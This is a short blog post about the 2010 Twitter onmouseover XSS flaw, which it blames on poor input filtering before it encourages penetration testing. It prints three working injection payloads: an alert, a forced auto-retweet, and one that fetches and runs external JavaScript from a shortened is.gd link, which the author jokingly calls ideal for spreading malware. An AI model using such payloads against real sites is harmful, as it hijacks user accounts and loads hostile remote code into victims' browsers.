Hi Folks,
as you probably know I am not used to write about vulnerabilities, but the last Twitter XSS vulnerability comes in the meddle of a vulnerability project where I am working in. The argument was how it is possible having xss vulnerabilities in 2010. My answer has been, and it is: " Because programming is Human". Humans make mistakes ... humans makes bugs that eventually become vulnerabilities. So here it is, last Twitter vulnerability is a perfect and simple XSS injection due to poor input filtering.
This the attack vector:
hppt://twitter.com/RainbowTwtr#@"onmouseover="javascript:alert('Hello World !');"/
When a mouse pointer goes over the tweet a classic "alert" comes out . Here we are, it's enough to browse a twit and you got exploit. Following more examples:
http://twitter.com/RainbowTwtr#@"onmouseover="document.getElementById('status').value='RT MoiMrJack';$('.status-update-form').submit();"font-size:500pt;/
Automatic re-tweet submission.
http://twitter.com/RainbowTwtr#@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')'/
This is pretty nesty, it executes an external javascript. This would be perfect for spreading out malwares :D !
Another interesting demonstration comes from Sophos Labs
Again, none is immune to bugs, please remember the importance of penetration testing, which is the only holistic way to find vulnerabilities.
"The system administrator needs to figure out all the possible bugs to protect his system. The attacker needs to find out only one bug to compromise the entire system"